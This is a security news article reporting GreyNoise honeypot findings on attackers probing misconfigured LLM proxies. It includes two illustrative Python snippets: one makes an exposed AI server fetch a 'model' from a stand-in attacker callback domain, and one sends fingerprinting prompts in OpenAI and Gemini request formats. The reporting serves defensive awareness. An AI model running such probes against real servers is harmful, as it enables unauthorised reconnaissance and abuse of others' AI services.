- GreyNoise logged 91,000 attack sessions against exposed AI systems between Oct 2025 and Jan 2026
- Campaigns included tricking servers into “phoning home” and mass probing to map AI models
- Malicious actors targeted misconfigured proxies, testing OpenAI, Gemini, and other LLM APIs at scale
Hackers are exploiting misconfigured proxies to breach the underlying Large Language Model (LLM) services, security researchers have warned.
Researchers at GreyNoise set up a honeypot, a deliberately exposed fake AI system, to observe how attackers interact with it.
From October 2025 to January 2026, they recorded over 91,000 attack sessions, revealing two distinct attack campaigns.
A Systematic Approach
In the first campaign, a threat actor attempted to trick AI servers into connecting to attacker-controlled infrastructure. They abused features like model downloads or webhooks, forcing the server to “phone home” without the owner's knowledge, then monitored the callbacks to confirm vulnerabilities in the underlying system.
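A minimal sketch of how such a “phone home” trick works, assuming a hypothetical self-hosted AI server with a model-pull feature; the endpoint path, payload, and addresses below are illustrative and not taken from GreyNoise's report:

```python
# Hypothetical sketch of the "phone home" technique described above.
# The /api/models/pull endpoint and its payload are illustrative, not a real
# product's API: many self-hosted LLM servers expose some form of "pull a
# model from a URL" or "register a webhook" feature that can be pointed at
# attacker infrastructure.
import requests

TARGET = "http://203.0.113.10:11434"    # exposed AI server (documentation address)
OAST_DOMAIN = "abc123.oast.example"     # attacker-monitored callback domain

# Ask the server to fetch a "model" hosted on the attacker's domain. If the
# server connects to OAST_DOMAIN, the attacker sees the callback in their
# out-of-band (OAST) logs and knows the target is live and exploitable.
try:
    resp = requests.post(
        f"{TARGET}/api/models/pull",    # hypothetical endpoint
        json={"source": f"https://{OAST_DOMAIN}/weights/model.bin"},
        timeout=10,
    )
    print(resp.status_code)
except requests.RequestException as exc:
    print("request failed:", exc)
```

The attacker never needs a response from the target itself; the callback arriving at the OAST domain is the signal.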
The second campaign involved two IP addresses bombarding exposed AI endpoints tens of thousands of times. Their goal was not immediate access but to map reachable AI models and their configurations. They posed simple questions like “How many states are there in the US” to identify the AI model in use without raising alarms.
They systematically tested OpenAI-style APIs, Google Gemini formats, and various major model families, searching for proxies or gateways that inadvertently expose paid or internal AI access.
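To illustrate why an innocuous prompt works as a fingerprint, here is a hedged sketch of such a probe against a hypothetical proxy address; the two request shapes are the standard OpenAI-compatible and Gemini API formats the scans reportedly tested:

```python
# Illustrative fingerprinting probe. The proxy address is hypothetical;
# the request bodies follow the real OpenAI-style and Gemini-style API shapes.
import requests

PROXY = "http://198.51.100.20:8080"     # suspected misconfigured proxy (example)
QUESTION = "How many states are there in the US?"

def probe(url: str, payload: dict) -> str:
    """Send one probe and summarize the result."""
    try:
        r = requests.post(url, json=payload, timeout=10)
        return f"{r.status_code} {r.text[:120]}"
    except requests.RequestException as exc:
        return f"unreachable ({exc.__class__.__name__})"

# OpenAI-compatible format: POST /v1/chat/completions with a messages array.
print("openai-style:", probe(
    f"{PROXY}/v1/chat/completions",
    {"model": "gpt-4o", "messages": [{"role": "user", "content": QUESTION}]},
))

# Gemini format: model name in the URL path, prompt in a contents/parts body.
print("gemini-style:", probe(
    f"{PROXY}/v1beta/models/gemini-pro:generateContent",
    {"contents": [{"parts": [{"text": QUESTION}]}]},
))
```

A well-formed answer, rather than a 404 or an error, tells the scanner which backend the proxy silently forwards to, without triggering the alarms a more aggressive payload might.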
GreyNoise took steps to rule out a hobbyist or cybersecurity researcher as the source. The infrastructure used in the second campaign had a documented history of real-world vulnerability exploitation, and the campaign peaked during the Christmas break, pointing to deliberate, malicious activity rather than routine research.
“OAST callbacks are standard vulnerability research techniques. However, the scale and timing suggest grey-hat operations pushing boundaries,” GreyNoise noted.
Moreover, the same servers had previously been observed scanning for hundreds of CVEs.
Via BleepingComputer